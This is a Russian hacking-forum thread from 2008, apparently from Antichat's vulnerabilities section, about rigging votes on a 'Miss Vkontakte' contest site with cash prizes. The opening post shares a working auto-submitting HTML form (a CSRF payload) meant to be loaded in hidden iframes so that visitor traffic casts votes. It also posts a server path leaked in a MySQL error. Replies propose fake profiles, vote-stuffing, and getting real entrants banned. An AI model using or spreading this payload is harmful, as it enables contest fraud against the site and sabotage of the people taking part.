Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Мисс Вконтакте 2008 xD (https://forum.antichat.xyz/showthread.php?t=81086)

T-Rey 16.08.2008 06:44
Мисс Вконтакте 2008 xD
 
Ходя по интернету наткнулся на сайт http://missvkontakte.com/

Цель его такова:
Девушки регистрируются
За них голосуют
И сами призы
Цитата:
1-место Приз: 300 000 рублей.
2-место Приз: 100 000 рублей.
3-место Приз: 50 000 рублей.
Голоса можно было отправить несколькими способами:
1 голос бесплатно (по ip каждые пол часа)
10 голосов СМС
100 голосов СМС

Ну покопавшись в сорцах сайта обнорушил, что +1 добавляется обычным post запросом (хоть бы капчу прикрутили :D )

И был написан iframe
PHP код:
<html>
<body>
<form name=MyForm action="http://missvkontakte.com/simplevoice.php" method=POST>
<input type=hidden name="id_miss" value="Номер учасницы">
</form>
<script>
document.MyForm.submit();
</script>
</body>
</html
Следовательно сливаем на него трафф и голоса летят) или крути пост через ТОПген

Так же заметил ошибку мускула где раскрытие путей:
PHP код:
Warningmysql_fetch_array(): supplied argument is
 not a valid MySQL result resource in /www/missvkon/www/htdocs/index.php on line 261 

Есть идеи? Что ещё можно найти тут?



P.S. Сайт ну никак не соответствует призовой сумме :rolleyes:



Благодарю комрада mr.The за помощь оказанную мне в поиске уязвимостей сайта.

GrAmOzEkA 16.08.2008 07:44
имхо, помоему лажа полная, можно конечно накрутить голосов понравившейся телке :), или создать фейковую анкету и накрутить себе ;), только есть один вопрос, а не кидалово ли этот сайт.

T-Rey 16.08.2008 07:59
Вот у меня точно такие же сомнения.
Хотят срубить на смс.

Акция до декабря, вполне реально, что приз будет.
Призовой фонд 450 тонн... они на той же рекламе и смс за это время в раза 4 больше получат.

KaZ@NoVa 16.08.2008 08:46
Цитата:
Сообщение от T-Rey
Вот у меня точно такие же сомнения.
Хотят срубить на смс.

Акция до декабря, вполне реально, что приз будет.
Призовой фонд 450 тонн... они на той же рекламе и смс за это время в раза 4 больше получат.
:d) Согласен!!!)) :D

T-Rey 16.08.2008 11:53
Никаких уязвимостей больше не обнаружено.
Кроме конечно того факта, при накрутки участници её банят :-l
Так диверсию устроить можно.

born2flood 16.08.2008 11:57
в бан всех!

Midas 16.08.2008 12:01
а можно ради проверки действительно создать фэйковую анкету и накрутить её на максимум. Посмотрим на реакцию администрации :)

born2flood 16.08.2008 12:02
http://vkontakte.ru/id16557956
действуйте, воены!

T-Rey 17.08.2008 17:37
Цитата:
Сообщение от born2flood
http://vkontakte.ru/id16557956
действуйте, воены!
Удалили.

Катю Пушкарёву в лидеры! :D


Нужен iframe траффик.

T-Rey 17.08.2008 19:02
http://vkontakte.ru/club3621274

Я плакатъ =))


Время: 12:33
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице